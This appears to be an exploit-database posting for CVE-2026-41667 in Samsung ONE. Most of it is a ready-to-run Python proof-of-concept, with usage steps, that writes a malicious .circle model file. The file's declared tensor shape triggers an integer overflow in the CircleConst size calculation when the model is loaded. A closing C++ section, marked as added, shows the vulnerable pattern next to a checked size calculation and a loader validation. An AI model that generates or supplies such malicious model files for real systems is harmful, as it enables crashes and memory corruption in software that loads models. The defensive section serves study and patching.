Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation
Samsung ONE has an integer overflow vulnerability (CVE-2026-41667) affecting versions earlier than 1.30.0. The vulnerability is triggered during the CircleConst tensor size calculation and has a CVSS score of 6.6. It has been fixed in PR #16481.

2026-4-26 21:7:24 Author: cxsecurity.com


```python
#!/usr/bin/env python3
# Exploit Title: Samsung ONE - Integer Overflow in CircleConst Tensor Size Calculation
# CVE: CVE-2026-41667
# Date: 2026-04-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/Samsung/ONE
# Software Link: https://github.com/Samsung/ONE
# Affected: Samsung ONE prior to PR #16481 (before 1.30.0)
# Tested on: Samsung ONE (vulnerable build)
# Category: Local
# Platform: Linux
# Exploit Type: Proof of Concept - Malicious Model Generator
# CVSS: 6.6
# CWE : CWE-190
# Description: Generates a malicious .circle model that triggers integer overflow in num_elements * element_size calculation.
# Fixed in: https://github.com/Samsung/ONE/pull/16481
# Usage: python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Options: None (standalone generator)
#
# Notes: Requires flatc generated 'circle' module. Loads with luci-interpreter or ONE runtime.
#
# How to Use
#
# Step 1: Generate bindings with flatc --python circle.fbs
# Step 2: Run this script to create poc_cve_2026_41667.circle
# Step 3: Load the model in vulnerable ONE build

print(r"""
b a n y a m e r _ s e c u r i t y
>>> Silent Hunter • Shadow Presence <<<
Operator : Mohammed Idrees Banyamer Jordan 🇯🇴
Handle : @banyamer_security
CVE-2026-41667 • Samsung ONE Integer Overflow
""")

import flatbuffers
import sys
import os

try:
    import circle as c
except ImportError:
    print("Error: 'circle' module not found.")
    print("Generate it with: flatc --python compiler/luci/schema/circle.fbs")
    print("Then copy the generated 'circle' folder here.")
    sys.exit(1)


def create_poc_model(output_path="poc_cve_2026_41667.circle"):
    builder = flatbuffers.Builder(1024 * 1024)

    huge_shape = [1, 1, 1, 1 << 30]
    c.ShapeStartDimsVector(builder, len(huge_shape))
    for d in reversed(huge_shape):
        builder.PrependInt32(d)
    shape_dims = builder.EndVector()
    shape = c.Shape.CreateShape(builder, shape_dims)

    data_bytes = b'\x00' * 64
    data_vec = builder.CreateByteVector(data_bytes)

    c.CircleConstStart(builder)
    c.CircleConstAddShape(builder, shape)
    c.CircleConstAddDtype(builder, c.DataType.INT8)
    c.CircleConstAddBuffer(builder, 0)
    c.CircleConstAddValue(builder, data_vec)
    const = c.CircleConstEnd(builder)

    c.SubGraphStartTensorsVector(builder, 1)
    builder.PrependUOffsetTRelative(const)
    tensors = builder.EndVector()

    c.SubGraphStartInputsVector(builder, 1)
    builder.PrependInt32(0)
    subgraph_inputs = builder.EndVector()

    c.SubGraphStartOutputsVector(builder, 1)
    builder.PrependInt32(0)
    subgraph_outputs = builder.EndVector()

    subgraph = c.SubGraphCreateSubGraph(builder,
                                        tensors=tensors,
                                        inputs=subgraph_inputs,
                                        outputs=subgraph_outputs,
                                        operators=None,
                                        name=b"main")

    c.ModelStartSubgraphsVector(builder, 1)
    builder.PrependUOffsetTRelative(subgraph)
    subgraphs = builder.EndVector()

    c.ModelStart(builder)
    c.ModelAddVersion(builder, 1)
    c.ModelAddSubgraphs(builder, subgraphs)
    model = c.ModelEnd(builder)

    builder.Finish(model)
    buf = builder.Output()

    with open(output_path, "wb") as f:
        f.write(buf)

    print(f"[+] PoC model created: {output_path}")
    print(f" Shape: {huge_shape} → ~{1<<30} elements (INT8)")
    print(f" Load with: ./luci-interpreter {output_path}")


if __name__ == "__main__":
    create_poc_model()
```
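The CWE-190 pattern named in the description (num_elements * element_size), shown beside an overflow-checked size calculation and a loader-side consistency check. This is an added example, not code from Samsung ONE or from PR #16481; the function names and the sample shape are constructed for illustration.

```cpp
// Added example, not Samsung ONE code: all function names are hypothetical.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <limits>
#include <vector>

// CWE-190 pattern: the element count and byte size are computed in 32 bits,
// so the product silently wraps modulo 2^32.
uint32_t unchecked_byte_size(const std::vector<int32_t>& dims, uint32_t elem_size) {
    uint32_t n = 1;
    for (int32_t d : dims) n *= static_cast<uint32_t>(d);
    return n * elem_size;
}

// Checked form: reject negative dimensions and any product that does not fit
// in size_t. Returns false instead of a wrapped value.
bool checked_byte_size(const std::vector<int32_t>& dims, size_t elem_size, size_t* out) {
    size_t total = elem_size;
    for (int32_t d : dims) {
        if (d < 0) return false;
        const size_t ud = static_cast<size_t>(d);
        if (ud != 0 && total > std::numeric_limits<size_t>::max() / ud) return false;
        total *= ud;
    }
    *out = total;
    return true;
}

// Loader-side validation: the size implied by the declared shape must equal
// the number of bytes actually stored for the constant.
bool const_tensor_is_consistent(const std::vector<int32_t>& dims, size_t elem_size,
                                size_t stored_bytes) {
    size_t need = 0;
    return checked_byte_size(dims, elem_size, &need) && need == stored_bytes;
}

int main() {
    // Constructed input: a declared shape whose 32-bit size wraps to zero.
    const std::vector<int32_t> dims = {65536, 65536};
    std::printf("unchecked: %u bytes\n", (unsigned)unchecked_byte_size(dims, 4));
    std::printf("consistent with 64 stored bytes: %d\n",
                (int)const_tensor_is_consistent(dims, 4, 64));
    return 0;
}
```

A loader that rejects the model when the consistency check fails never allocates or copies based on a wrapped size.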



 


Source: https://cxsecurity.com/issue/WLB-2026040018